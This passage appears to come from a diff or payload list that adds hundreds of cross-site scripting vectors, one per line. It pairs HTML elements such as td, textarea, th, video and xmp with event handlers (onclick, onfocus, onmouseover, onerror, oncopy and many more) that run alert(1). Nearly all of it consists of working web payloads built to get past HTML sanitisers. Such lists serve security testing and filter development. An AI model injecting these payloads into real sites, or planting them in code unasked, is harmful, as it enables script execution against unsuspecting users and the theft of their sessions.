ondragstart="alert(1)">test</td> +<td id=x tabindex=1 onactivate=alert(1)></td> +<td id=x tabindex=1 onbeforeactivate=alert(1)></td> +<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> +<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> +<td id=x tabindex=1 onfocus=alert(1)></td> +<td id=x tabindex=1 onfocusin=alert(1)></td> +<td onbeforecopy="alert(1)" contenteditable>test</td> +<td onbeforecut="alert(1)" contenteditable>test</td> +<td onbeforepaste="alert(1)" contenteditable>test</td> +<td onblur=alert(1) tabindex=1 id=x></td><input autofocus> +<td onclick="alert(1)">test</td> +<td oncontextmenu="alert(1)">test</td> +<td oncopy="alert(1)" contenteditable>test</td> +<td oncut="alert(1)" contenteditable>test</td> +<td ondblclick="alert(1)">test</td> +<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> +<td onkeydown="alert(1)" contenteditable>test</td> +<td onkeypress="alert(1)" contenteditable>test</td> +<td onkeyup="alert(1)" contenteditable>test</td> +<td onmousedown="alert(1)">test</td> +<td onmouseenter="alert(1)">test</td> +<td onmouseleave="alert(1)">test</td> +<td onmousemove="alert(1)">test</td> +<td onmouseout="alert(1)">test</td> +<td onmouseover="alert(1)">test</td> +<td onmouseup="alert(1)">test</td> +<td onpaste="alert(1)" contenteditable>test</td> +<template draggable="true" ondrag="alert(1)">test</template> +<template draggable="true" ondragend="alert(1)">test</template> +<template draggable="true" ondragenter="alert(1)">test</template> +<template draggable="true" ondragleave="alert(1)">test</template> +<template draggable="true" ondragstart="alert(1)">test</template> +<template id=x tabindex=1 onactivate=alert(1)></template> +<template id=x tabindex=1 onbeforeactivate=alert(1)></template> +<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> +<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> +<template id=x tabindex=1 onfocus=alert(1)></template> +<template id=x tabindex=1 onfocusin=alert(1)></template> +<template onbeforecopy="alert(1)" contenteditable>test</template> +<template onbeforecut="alert(1)" contenteditable>test</template> +<template onbeforepaste="alert(1)" contenteditable>test</template> +<template onblur=alert(1) tabindex=1 id=x></template><input autofocus> +<template onclick="alert(1)">test</template> +<template oncontextmenu="alert(1)">test</template> +<template oncopy="alert(1)" contenteditable>test</template> +<template oncut="alert(1)" contenteditable>test</template> +<template ondblclick="alert(1)">test</template> +<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> +<template onkeydown="alert(1)" contenteditable>test</template> +<template onkeypress="alert(1)" contenteditable>test</template> +<template onkeyup="alert(1)" contenteditable>test</template> +<template onmousedown="alert(1)">test</template> +<template onmouseenter="alert(1)">test</template> +<template onmouseleave="alert(1)">test</template> +<template onmousemove="alert(1)">test</template> +<template onmouseout="alert(1)">test</template> +<template onmouseover="alert(1)">test</template> +<template onmouseup="alert(1)">test</template> +<template onpaste="alert(1)" contenteditable>test</template> +<textarea autofocus onfocus=alert(1)>test</textarea> +<textarea autofocus onfocusin=alert(1)>test</textarea> +<textarea draggable="true" ondrag="alert(1)">test</textarea> +<textarea draggable="true" ondragend="alert(1)">test</textarea> +<textarea draggable="true" ondragenter="alert(1)">test</textarea> +<textarea draggable="true" ondragleave="alert(1)">test</textarea> +<textarea draggable="true" ondragstart="alert(1)">test</textarea> +<textarea id=x tabindex=1 onactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> +<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> +<textarea onauxclick=alert(1)>XSS</textarea> +<textarea onbeforecopy=alert(1) autofocus>XSS</textarea> +<textarea onbeforecut=alert(1) autofocus>XSS</textarea> +<textarea onbeforepaste=alert(1) autofocus></textarea> +<textarea onblur=alert(1) id=x></textarea><input autofocus> +<textarea onchange=alert(1)>XSS</textarea> +<textarea onclick="alert(1)">test</textarea> +<textarea oncontextmenu="alert(1)">test</textarea> +<textarea oncopy=alert(1) autofocus>XSS</textarea> +<textarea oncut=alert(1) autofocus>XSS</textarea> +<textarea ondblclick="alert(1)">test</textarea> +<textarea onfocusout=alert(1) id=x></textarea><input autofocus> +<textarea oninput=alert(1)>XSS</textarea> +<textarea onkeydown="alert(1)" contenteditable>test</textarea> +<textarea onkeypress="alert(1)" contenteditable>test</textarea> +<textarea onkeyup="alert(1)" contenteditable>test</textarea> +<textarea onmousedown="alert(1)">test</textarea> +<textarea onmouseenter="alert(1)">test</textarea> +<textarea onmouseleave="alert(1)">test</textarea> +<textarea onmousemove="alert(1)">test</textarea> +<textarea onmouseout="alert(1)">test</textarea> +<textarea onmouseover="alert(1)">test</textarea> +<textarea onmouseup="alert(1)">test</textarea> +<textarea onpaste=alert(1) autofocus></textarea> +<textarea onselect=alert(1) autofocus>XSS</textarea> +<tfoot draggable="true" ondrag="alert(1)">test</tfoot> +<tfoot draggable="true" ondragend="alert(1)">test</tfoot> +<tfoot draggable="true" ondragenter="alert(1)">test</tfoot> +<tfoot draggable="true" ondragleave="alert(1)">test</tfoot> +<tfoot draggable="true" ondragstart="alert(1)">test</tfoot> +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> +<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> +<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> +<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onclick="alert(1)">test</tfoot> +<tfoot oncontextmenu="alert(1)">test</tfoot> +<tfoot oncopy="alert(1)" contenteditable>test</tfoot> +<tfoot oncut="alert(1)" contenteditable>test</tfoot> +<tfoot ondblclick="alert(1)">test</tfoot> +<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onkeydown="alert(1)" contenteditable>test</tfoot> +<tfoot onkeypress="alert(1)" contenteditable>test</tfoot> +<tfoot onkeyup="alert(1)" contenteditable>test</tfoot> +<tfoot onmousedown="alert(1)">test</tfoot> +<tfoot onmouseenter="alert(1)">test</tfoot> +<tfoot onmouseleave="alert(1)">test</tfoot> +<tfoot onmousemove="alert(1)">test</tfoot> +<tfoot onmouseout="alert(1)">test</tfoot> +<tfoot onmouseover="alert(1)">test</tfoot> +<tfoot onmouseup="alert(1)">test</tfoot> +<tfoot onpaste="alert(1)" contenteditable>test</tfoot> +<th draggable="true" ondrag="alert(1)">test</th> +<th draggable="true" ondragend="alert(1)">test</th> +<th draggable="true" ondragenter="alert(1)">test</th> +<th draggable="true" ondragleave="alert(1)">test</th> +<th draggable="true" ondragstart="alert(1)">test</th> +<th id=x tabindex=1 onactivate=alert(1)></th> +<th id=x tabindex=1 onbeforeactivate=alert(1)></th> +<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> +<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> +<th id=x tabindex=1 onfocus=alert(1)></th> +<th id=x tabindex=1 onfocusin=alert(1)></th> +<th onbeforecopy="alert(1)" contenteditable>test</th> +<th onbeforecut="alert(1)" contenteditable>test</th> +<th onbeforepaste="alert(1)" contenteditable>test</th> +<th onblur=alert(1) tabindex=1 id=x></th><input autofocus> +<th onclick="alert(1)">test</th> +<th oncontextmenu="alert(1)">test</th> +<th oncopy="alert(1)" contenteditable>test</th> +<th oncut="alert(1)" contenteditable>test</th> +<th ondblclick="alert(1)">test</th> +<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> +<th onkeydown="alert(1)" contenteditable>test</th> +<th onkeypress="alert(1)" contenteditable>test</th> +<th onkeyup="alert(1)" contenteditable>test</th> +<th onmousedown="alert(1)">test</th> +<th onmouseenter="alert(1)">test</th> +<th onmouseleave="alert(1)">test</th> +<th onmousemove="alert(1)">test</th> +<th onmouseout="alert(1)">test</th> +<th onmouseover="alert(1)">test</th> +<th onmouseup="alert(1)">test</th> +<th onpaste="alert(1)" contenteditable>test</th> +<thead draggable="true" ondrag="alert(1)">test</thead> +<thead draggable="true" ondragend="alert(1)">test</thead> +<thead draggable="true" ondragenter="alert(1)">test</thead> +<thead draggable="true" ondragleave="alert(1)">test</thead> +<thead draggable="true" ondragstart="alert(1)">test</thead> +<thead id=x tabindex=1 onactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> +<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> +<thead id=x tabindex=1 onfocus=alert(1)></thead> +<thead id=x tabindex=1 onfocusin=alert(1)></thead> +<thead onbeforecopy="alert(1)" contenteditable>test</thead> +<thead onbeforecut="alert(1)" contenteditable>test</thead> +<thead onbeforepaste="alert(1)" contenteditable>test</thead> +<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onclick="alert(1)">test</thead> +<thead oncontextmenu="alert(1)">test</thead> +<thead oncopy="alert(1)" contenteditable>test</thead> +<thead oncut="alert(1)" contenteditable>test</thead> +<thead ondblclick="alert(1)">test</thead> +<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onkeydown="alert(1)" contenteditable>test</thead> +<thead onkeypress="alert(1)" contenteditable>test</thead> +<thead onkeyup="alert(1)" contenteditable>test</thead> +<thead onmousedown="alert(1)">test</thead> +<thead onmouseenter="alert(1)">test</thead> +<thead onmouseleave="alert(1)">test</thead> +<thead onmousemove="alert(1)">test</thead> +<thead onmouseout="alert(1)">test</thead> +<thead onmouseover="alert(1)">test</thead> +<thead onmouseup="alert(1)">test</thead> +<thead onpaste="alert(1)" contenteditable>test</thead> +<time draggable="true" ondrag="alert(1)">test</time> +<time draggable="true" ondragend="alert(1)">test</time> +<time draggable="true" ondragenter="alert(1)">test</time> +<time draggable="true" ondragleave="alert(1)">test</time> +<time draggable="true" ondragstart="alert(1)">test</time> +<time id=x tabindex=1 onactivate=alert(1)></time> +<time id=x tabindex=1 onbeforeactivate=alert(1)></time> +<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> +<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> +<time id=x tabindex=1 onfocus=alert(1)></time> +<time id=x tabindex=1 onfocusin=alert(1)></time> +<time onbeforecopy="alert(1)" contenteditable>test</time> +<time onbeforecut="alert(1)" contenteditable>test</time> +<time onbeforepaste="alert(1)" contenteditable>test</time> +<time onblur=alert(1) tabindex=1 id=x></time><input autofocus> +<time onclick="alert(1)">test</time> +<time oncontextmenu="alert(1)">test</time> +<time oncopy="alert(1)" contenteditable>test</time> +<time oncut="alert(1)" contenteditable>test</time> +<time ondblclick="alert(1)">test</time> +<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> +<time onkeydown="alert(1)" contenteditable>test</time> +<time onkeypress="alert(1)" contenteditable>test</time> +<time onkeyup="alert(1)" contenteditable>test</time> +<time onmousedown="alert(1)">test</time> +<time onmouseenter="alert(1)">test</time> +<time onmouseleave="alert(1)">test</time> +<time onmousemove="alert(1)">test</time> +<time onmouseout="alert(1)">test</time> +<time onmouseover="alert(1)">test</time> +<time onmouseup="alert(1)">test</time> +<time onpaste="alert(1)" contenteditable>test</time> +<title draggable="true" ondrag="alert(1)">test</title> +<title draggable="true" ondragend="alert(1)">test</title> +<title draggable="true" ondragenter="alert(1)">test</title> +<title draggable="true" ondragleave="alert(1)">test</title> +<title draggable="true" ondragstart="alert(1)">test</title> +<title id=x tabindex=1 onactivate=alert(1)></title> +<title id=x tabindex=1 onbeforeactivate=alert(1)></title> +<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> +<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> +<title id=x tabindex=1 onfocus=alert(1)></title> +<title id=x tabindex=1 onfocusin=alert(1)></title> +<title onbeforecopy="alert(1)" contenteditable>test</title> +<title onbeforecut="alert(1)" contenteditable>test</title> +<title onbeforepaste="alert(1)" contenteditable>test</title> +<title onblur=alert(1) tabindex=1 id=x></title><input autofocus> +<title onclick="alert(1)">test</title> +<title oncontextmenu="alert(1)">test</title> +<title oncopy="alert(1)" contenteditable>test</title> +<title oncut="alert(1)" contenteditable>test</title> +<title ondblclick="alert(1)">test</title> +<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> +<title onkeydown="alert(1)" contenteditable>test</title> +<title onkeypress="alert(1)" contenteditable>test</title> +<title onkeyup="alert(1)" contenteditable>test</title> +<title onmousedown="alert(1)">test</title> +<title onmouseenter="alert(1)">test</title> +<title onmouseleave="alert(1)">test</title> +<title onmousemove="alert(1)">test</title> +<title onmouseout="alert(1)">test</title> +<title onmouseover="alert(1)">test</title> +<title onmouseup="alert(1)">test</title> +<title onpaste="alert(1)" contenteditable>test</title> +<tr draggable="true" ondrag="alert(1)">test</tr> +<tr draggable="true" ondragend="alert(1)">test</tr> +<tr draggable="true" ondragenter="alert(1)">test</tr> +<tr draggable="true" ondragleave="alert(1)">test</tr> +<tr draggable="true" ondragstart="alert(1)">test</tr> +<tr id=x tabindex=1 onactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> +<tr id=x tabindex=1 onfocus=alert(1)></tr> +<tr id=x tabindex=1 onfocusin=alert(1)></tr> +<tr onbeforecopy="alert(1)" contenteditable>test</tr> +<tr onbeforecut="alert(1)" contenteditable>test</tr> +<tr onbeforepaste="alert(1)" contenteditable>test</tr> +<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onclick="alert(1)">test</tr> +<tr oncontextmenu="alert(1)">test</tr> +<tr oncopy="alert(1)" contenteditable>test</tr> +<tr oncut="alert(1)" contenteditable>test</tr> +<tr ondblclick="alert(1)">test</tr> +<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onkeydown="alert(1)" contenteditable>test</tr> +<tr onkeypress="alert(1)" contenteditable>test</tr> +<tr onkeyup="alert(1)" contenteditable>test</tr> +<tr onmousedown="alert(1)">test</tr> +<tr onmouseenter="alert(1)">test</tr> +<tr onmouseleave="alert(1)">test</tr> +<tr onmousemove="alert(1)">test</tr> +<tr onmouseout="alert(1)">test</tr> +<tr onmouseover="alert(1)">test</tr> +<tr onmouseup="alert(1)">test</tr> +<tr onpaste="alert(1)" contenteditable>test</tr> +<track draggable="true" ondrag="alert(1)">test</track> +<track draggable="true" ondragend="alert(1)">test</track> +<track draggable="true" ondragenter="alert(1)">test</track> +<track draggable="true" ondragleave="alert(1)">test</track> +<track draggable="true" ondragstart="alert(1)">test</track> +<track id=x tabindex=1 onactivate=alert(1)></track> +<track id=x tabindex=1 onbeforeactivate=alert(1)></track> +<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> +<track id=x tabindex=1 onfocus=alert(1)></track> +<track id=x tabindex=1 onfocusin=alert(1)></track> +<track onbeforecopy="alert(1)" contenteditable>test</track> +<track onbeforecut="alert(1)" contenteditable>test</track> +<track onbeforepaste="alert(1)" contenteditable>test</track> +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus> +<track onclick="alert(1)">test</track> +<track oncontextmenu="alert(1)">test</track> +<track oncopy="alert(1)" contenteditable>test</track> +<track oncut="alert(1)" contenteditable>test</track> +<track ondblclick="alert(1)">test</track> +<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> +<track onkeydown="alert(1)" contenteditable>test</track> +<track onkeypress="alert(1)" contenteditable>test</track> +<track onkeyup="alert(1)" contenteditable>test</track> +<track onmousedown="alert(1)">test</track> +<track onmouseenter="alert(1)">test</track> +<track onmouseleave="alert(1)">test</track> +<track onmousemove="alert(1)">test</track> +<track onmouseout="alert(1)">test</track> +<track onmouseover="alert(1)">test</track> +<track onmouseup="alert(1)">test</track> +<track onpaste="alert(1)" contenteditable>test</track> +<tt draggable="true" ondrag="alert(1)">test</tt> +<tt draggable="true" ondragend="alert(1)">test</tt> +<tt draggable="true" ondragenter="alert(1)">test</tt> +<tt draggable="true" ondragleave="alert(1)">test</tt> +<tt draggable="true" ondragstart="alert(1)">test</tt> +<tt id=x tabindex=1 onactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> +<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> +<tt id=x tabindex=1 onfocus=alert(1)></tt> +<tt id=x tabindex=1 onfocusin=alert(1)></tt> +<tt onbeforecopy="alert(1)" contenteditable>test</tt> +<tt onbeforecut="alert(1)" contenteditable>test</tt> +<tt onbeforepaste="alert(1)" contenteditable>test</tt> +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onclick="alert(1)">test</tt> +<tt oncontextmenu="alert(1)">test</tt> +<tt oncopy="alert(1)" contenteditable>test</tt> +<tt oncut="alert(1)" contenteditable>test</tt> +<tt ondblclick="alert(1)">test</tt> +<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onkeydown="alert(1)" contenteditable>test</tt> +<tt onkeypress="alert(1)" contenteditable>test</tt> +<tt onkeyup="alert(1)" contenteditable>test</tt> +<tt onmousedown="alert(1)">test</tt> +<tt onmouseenter="alert(1)">test</tt> +<tt onmouseleave="alert(1)">test</tt> +<tt onmousemove="alert(1)">test</tt> +<tt onmouseout="alert(1)">test</tt> +<tt onmouseover="alert(1)">test</tt> +<tt onmouseup="alert(1)">test</tt> +<tt onpaste="alert(1)" contenteditable>test</tt> +<u draggable="true" ondrag="alert(1)">test</u> +<u draggable="true" ondragend="alert(1)">test</u> +<u draggable="true" ondragenter="alert(1)">test</u> +<u draggable="true" ondragleave="alert(1)">test</u> +<u draggable="true" ondragstart="alert(1)">test</u> +<u id=x tabindex=1 onactivate=alert(1)></u> +<u id=x tabindex=1 onbeforeactivate=alert(1)></u> +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> +<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> +<u id=x tabindex=1 onfocus=alert(1)></u> +<u id=x tabindex=1 onfocusin=alert(1)></u> +<u onbeforecopy="alert(1)" contenteditable>test</u> +<u onbeforecut="alert(1)" contenteditable>test</u> +<u onbeforepaste="alert(1)" contenteditable>test</u> +<u onblur=alert(1) tabindex=1 id=x></u><input autofocus> +<u onclick="alert(1)">test</u> +<u oncontextmenu="alert(1)">test</u> +<u oncopy="alert(1)" contenteditable>test</u> +<u oncut="alert(1)" contenteditable>test</u> +<u ondblclick="alert(1)">test</u> +<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> +<u onkeydown="alert(1)" contenteditable>test</u> +<u onkeypress="alert(1)" contenteditable>test</u> +<u onkeyup="alert(1)" contenteditable>test</u> +<u onmousedown="alert(1)">test</u> +<u onmouseenter="alert(1)">test</u> +<u onmouseleave="alert(1)">test</u> +<u onmousemove="alert(1)">test</u> +<u onmouseout="alert(1)">test</u> +<u onmouseover="alert(1)">test</u> +<u onmouseup="alert(1)">test</u> +<u onpaste="alert(1)" contenteditable>test</u> +<ul draggable="true" ondrag="alert(1)">test</ul> +<ul draggable="true" ondragend="alert(1)">test</ul> +<ul draggable="true" ondragenter="alert(1)">test</ul> +<ul draggable="true" ondragleave="alert(1)">test</ul> +<ul draggable="true" ondragstart="alert(1)">test</ul> +<ul id=x tabindex=1 onactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> +<ul id=x tabindex=1 onfocus=alert(1)></ul> +<ul id=x tabindex=1 onfocusin=alert(1)></ul> +<ul onbeforecopy="alert(1)" contenteditable>test</ul> +<ul onbeforecut="alert(1)" contenteditable>test</ul> +<ul onbeforepaste="alert(1)" contenteditable>test</ul> +<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onclick="alert(1)">test</ul> +<ul oncontextmenu="alert(1)">test</ul> +<ul oncopy="alert(1)" contenteditable>test</ul> +<ul oncut="alert(1)" contenteditable>test</ul> +<ul ondblclick="alert(1)">test</ul> +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onkeydown="alert(1)" contenteditable>test</ul> +<ul onkeypress="alert(1)" contenteditable>test</ul> +<ul onkeyup="alert(1)" contenteditable>test</ul> +<ul onmousedown="alert(1)">test</ul> +<ul onmouseenter="alert(1)">test</ul> +<ul onmouseleave="alert(1)">test</ul> +<ul onmousemove="alert(1)">test</ul> +<ul onmouseout="alert(1)">test</ul> +<ul onmouseover="alert(1)">test</ul> +<ul onmouseup="alert(1)">test</ul> +<ul onpaste="alert(1)" contenteditable>test</ul> +<var draggable="true" ondrag="alert(1)">test</var> +<var draggable="true" ondragend="alert(1)">test</var> +<var draggable="true" ondragenter="alert(1)">test</var> +<var draggable="true" ondragleave="alert(1)">test</var> +<var draggable="true" ondragstart="alert(1)">test</var> +<var id=x tabindex=1 onactivate=alert(1)></var> +<var id=x tabindex=1 onbeforeactivate=alert(1)></var> +<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> +<var id=x tabindex=1 onfocus=alert(1)></var> +<var id=x tabindex=1 onfocusin=alert(1)></var> +<var onbeforecopy="alert(1)" contenteditable>test</var> +<var onbeforecut="alert(1)" contenteditable>test</var> +<var onbeforepaste="alert(1)" contenteditable>test</var> +<var onblur=alert(1) tabindex=1 id=x></var><input autofocus> +<var onclick="alert(1)">test</var> +<var oncontextmenu="alert(1)">test</var> +<var oncopy="alert(1)" contenteditable>test</var> +<var oncut="alert(1)" contenteditable>test</var> +<var ondblclick="alert(1)">test</var> +<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> +<var onkeydown="alert(1)" contenteditable>test</var> +<var onkeypress="alert(1)" contenteditable>test</var> +<var onkeyup="alert(1)" contenteditable>test</var> +<var onmousedown="alert(1)">test</var> +<var onmouseenter="alert(1)">test</var> +<var onmouseleave="alert(1)">test</var> +<var onmousemove="alert(1)">test</var> +<var onmouseout="alert(1)">test</var> +<var onmouseover="alert(1)">test</var> +<var onmouseup="alert(1)">test</var> +<var onpaste="alert(1)" contenteditable>test</var> +<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video draggable="true" ondrag="alert(1)">test</video> +<video draggable="true" ondragend="alert(1)">test</video> +<video draggable="true" ondragenter="alert(1)">test</video> +<video draggable="true" ondragleave="alert(1)">test</video> +<video draggable="true" ondragstart="alert(1)">test</video> +<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x tabindex=1 onactivate=alert(1)></video> +<video id=x tabindex=1 onbeforeactivate=alert(1)></video> +<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> +<video onbeforecopy="alert(1)" contenteditable>test</video> +<video onbeforecut="alert(1)" contenteditable>test</video> +<video onbeforepaste="alert(1)" contenteditable>test</video> +<video onblur=alert(1) tabindex=1 id=x></video><input autofocus> +<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onclick="alert(1)">test</video> +<video oncontextmenu="alert(1)">test</video> +<video oncopy="alert(1)" contenteditable>test</video> +<video oncut="alert(1)" contenteditable>test</video> +<video ondblclick="alert(1)">test</video> +<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> +<video onkeydown="alert(1)" contenteditable>test</video> +<video onkeypress="alert(1)" contenteditable>test</video> +<video onkeyup="alert(1)" contenteditable>test</video> +<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onmousedown="alert(1)">test</video> +<video onmouseenter="alert(1)">test</video> +<video onmouseleave="alert(1)">test</video> +<video onmousemove="alert(1)">test</video> +<video onmouseout="alert(1)">test</video> +<video onmouseover="alert(1)">test</video> +<video onmouseup="alert(1)">test</video> +<video onpaste="alert(1)" contenteditable>test</video> +<video src/onerror=alert(1)> +<video><source onerror=alert(1) src=1></video> +<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> +<wbr draggable="true" ondrag="alert(1)">test</wbr> +<wbr draggable="true" ondragend="alert(1)">test</wbr> +<wbr draggable="true" ondragenter="alert(1)">test</wbr> +<wbr draggable="true" ondragleave="alert(1)">test</wbr> +<wbr draggable="true" ondragstart="alert(1)">test</wbr> +<wbr id=x tabindex=1 onactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> +<wbr id=x tabindex=1 onfocus=alert(1)></wbr> +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr> +<wbr onbeforecopy="alert(1)" contenteditable>test</wbr> +<wbr onbeforecut="alert(1)" contenteditable>test</wbr> +<wbr onbeforepaste="alert(1)" contenteditable>test</wbr> +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onclick="alert(1)">test</wbr> +<wbr oncontextmenu="alert(1)">test</wbr> +<wbr oncopy="alert(1)" contenteditable>test</wbr> +<wbr oncut="alert(1)" contenteditable>test</wbr> +<wbr ondblclick="alert(1)">test</wbr> +<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onkeydown="alert(1)" contenteditable>test</wbr> +<wbr onkeypress="alert(1)" contenteditable>test</wbr> +<wbr onkeyup="alert(1)" contenteditable>test</wbr> +<wbr onmousedown="alert(1)">test</wbr> +<wbr onmouseenter="alert(1)">test</wbr> +<wbr onmouseleave="alert(1)">test</wbr> +<wbr onmousemove="alert(1)">test</wbr> +<wbr onmouseout="alert(1)">test</wbr> +<wbr onmouseover="alert(1)">test</wbr> +<wbr onmouseup="alert(1)">test</wbr> +<wbr onpaste="alert(1)" contenteditable>test</wbr> +<xmp draggable="true" ondrag="alert(1)">test</xmp> +<xmp draggable="true" ondragend="alert(1)">test</xmp> +<xmp draggable="true" ondragenter="alert(1)">test</xmp> +<xmp draggable="true" ondragleave="alert(1)">test</xmp> +<xmp draggable="true" ondragstart="alert(1)">test</xmp> +<xmp id=x tabindex=1 onactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> +<xmp id=x tabindex=1 onfocus=alert(1)></xmp> +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp> +<xmp onbeforecopy="alert(1)" contenteditable>test</xmp> +<xmp onbeforecut="alert(1)" contenteditable>test</xmp> +<xmp onbeforepaste="alert(1)" contenteditable>test</xmp> +<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onclick="alert(1)">test</xmp> +<xmp oncontextmenu="alert(1)">test</xmp> +<xmp oncopy="alert(1)" contenteditable>test</xmp> +<xmp oncut="alert(1)" contenteditable>test</xmp> +<xmp ondblclick="alert(1)">test</xmp> +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onkeydown="alert(1)" contenteditable>test</xmp> +<xmp onkeypress="alert(1)" contenteditable>test</xmp> +<xmp onkeyup="alert(1)" contenteditable>test</xmp> +<xmp onmousedown="alert(1)">test</xmp> +<xmp onmouseenter="alert(1)">test</xmp> +<xmp onmouseleave="alert(1)">test</xmp> +<xmp onmousemove="alert(1)">test</xmp> +<xmp onmouseout="alert(1)">test</xmp> +<xmp onmouseover="alert(1)">test</xmp> +<xmp onmouseup="alert(1)">test</xmp> +<xmp onpaste="alert(1)" contenteditable>test</xmp> +<xss id=x tabindex=1 onactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input 